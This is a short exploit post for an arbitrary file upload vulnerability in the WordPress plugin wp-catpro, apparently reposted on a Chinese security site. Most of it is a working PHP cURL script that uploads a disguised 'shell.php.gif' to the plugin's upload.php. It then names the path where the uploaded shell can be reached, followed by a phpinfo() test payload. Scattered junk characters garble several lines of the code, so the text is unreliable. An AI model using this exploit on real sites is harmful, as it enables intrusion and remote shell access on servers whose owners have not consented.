WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
* S6 \1 E& H: g#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
1 ?3 m+ p- Z6 `' d6 @. E测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
& k: @8 r; @; m& F
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
: d4 O; C) b, m6 w, I# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
& x( n6 T& X! p) m/ Z' M; C0 D1 m------------------
# ~7 ?( V8 m  E# P
#=> Exploit
( |2 t: L' w7 i2 q( k-----------
% Y$ e+ z& s1 v5 p6 [% S<?php

$uploadfile="zik.php.gif";
, |: e1 d  H# {$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
1 Q. m  g- g  j8 X'folder'=>'/wp-content/uploads/catpro/'));
" n2 j) Z# q; W8 p" A6 E# u. _' mcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
8 l+ G& M6 D8 L0 P6 A. j6 Kcurl_close($ch);
* E6 O8 A/ ]& Y2 O
print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
! S' m) r) y# M9 s# c<?php
phpinfo();
?>